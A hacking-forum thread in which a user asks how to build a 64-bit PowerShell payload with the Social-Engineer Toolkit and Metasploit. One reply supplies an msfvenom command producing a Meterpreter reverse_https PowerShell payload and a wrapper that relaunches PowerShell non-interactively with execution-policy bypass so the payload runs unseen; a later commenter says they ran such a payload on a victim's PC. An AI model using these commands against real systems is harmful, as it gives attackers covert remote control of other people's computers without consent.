Ok im using kali linux and i try to create a powershell x64 payload but its only creating x86 payloads.
I found a couple of tutorials searching google but they were not so clear.
If someone could help, i just want to create a powershell payload that would work on x64 computer.
Thanks and long live Null Byte.
Forum Thread: Powershell Payload Problem
- Hot
- Active
-
Forum Thread: How to Track Who Is Sms Bombing Me . 4 Replies
1 mo ago -
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
2 mo ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
2 mo ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
3 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
4 mo ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 1 Replies
5 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
5 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
6 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
6 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
7 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
9 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
9 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
9 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
9 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
9 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
9 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
10 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
11 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
11 mo ago
-
How To: Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel Spreadsheets
-
How To: Spy on Traffic from a Smartphone with Wireshark
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: This Top-Rated Course Will Make You a Linux Master
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Use Kismet to Watch Wi-Fi User Activity Through Walls
-
Hack Like a Pro: How to Find Directories in Websites Using DirBuster
-
How to Hack Wi-Fi: Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To: Exploit EternalBlue on Windows Server with Metasploit
-
How To: Stealthfully Sniff Wi-Fi Activity Without Connecting to a Target Router
-
Locking Down Linux: Using Ubuntu as Your Primary OS, Part 3 (Application Hardening & Sandboxing)
-
Hack Like a Pro: Abusing DNS for Reconnaissance
-
How To: The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How to Hack Wi-Fi: Cracking WEP Passwords with Aircrack-Ng
-
How To: Intercept Images from a Security Camera Using Wireshark
-
How To: Use Hash-Identifier to Determine Hash Types for Password Cracking
14 Responses
Xorion2:
First, what exploit are you using the payload with?
Second, is Metasploit installed on a x86 system or x64?
OTW
I use the alphanumeric payload in setoolkit---powershell attack vector--- alphanumeric shellcode injector.
I use both nethunter on my nexus 5 and nexus 7(2013) and kali on my 64 bits laptop and i get the same problem on all the devices , its only creating x86 payloads.
I want to run the payload on my laptop but im sure a x86 payload won't do it.
To make it clear kali is in virtualbox on my 8.1 laptop and i want to run the payload on the windows side.
Can you show us a screenshot?
Thats a screenshot of the final process, i just black out my ip address.
As you can see im not asked to create a x64 payload it straight go and create a x86 one.
I believe there is only a x86 Powershell payload in Metasploit.
I think it would be a good project for you to create a x64 Powershell payload.
Thats what i was thinking, i will try to do that but i would need guidance on what needs to be modify in the script to make it work .
I don't know about making the payload work with what your trying to do with SET, but I can show you how to make a 64 bit powershell payload if you are interested.
That would be great.
How?
It has been a while since I discussed this, but in regards to computer science and not hacking, x64 has far more potential due to its backwards compatibility with x86 programs. I'm new to kali so I cannot offer advice on what to do besides switch to a 64 bit shell. There are probably people out there (Like the post above) who can make one though.
Ok, let me start by apologizing. I created a How To that would have explained this and so much more but never posted it. Anyways...
There are 64 bit payloads in metasploit and are located in the usr/share/metasploit-framework/modules/payloads directory. Just look for the x64 directory located in what ever payload type you are looking for (singles, stagers, stages).
However if you want to make a 32 bit payload work on a 64 bit windows machine with powershell you simply have to add the following IF statement to the very beginning of the script.
if ($env:Processor_Architecture -ne "x86")
{
&"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" –noexit -noninteractive -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass
exit
}
This statement tells the natively called powershell (32 bit powershell on 32 bit machines and 64 bit powershell on 64 bit machines) to check the processor architecture. If it is not 32 bit then it will call the 32 bit powershell located in the syswow64 directory with the following parameters.
-noexit (tells powershell not to exit once the script is executed)
-noninteractive (opens powershell in the background)
-noprofile (bypasses any profiles that may keep the script from executing)
-file $myinvocation.Mycommand.path (tells powershell what script called it so it can continue on with the payload)
-executionpolicy bypass (bypasses any execution policies that may keep the script from executing)
So to use this in an example we can create a powershell payload with msfvenom like this
root@Kali:~# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 -f psh -o /root/Desktop/powershell_win_met_https.ps1
Command explained:
msfvenom calls the program
-p specifies the payload to use
LHOST & LPORT sets the payloads options
-f specifies the output format
-o specifies were to save the payload
Then we just open the newly created file with any text editor and add the above IF statement to the very beginning.
Thanks a lot i will try that.
Thanks for that Dill.
Good and valuable info.
You are welcome, I hope it helps.
Hello! my problem is this when I run powershell payload on my virtual machine it works fine but when I execute this payload in someone pc and wait for starting the payload handler it does not start even the payload successfully ran in victim's pc please help
Share Your Thoughts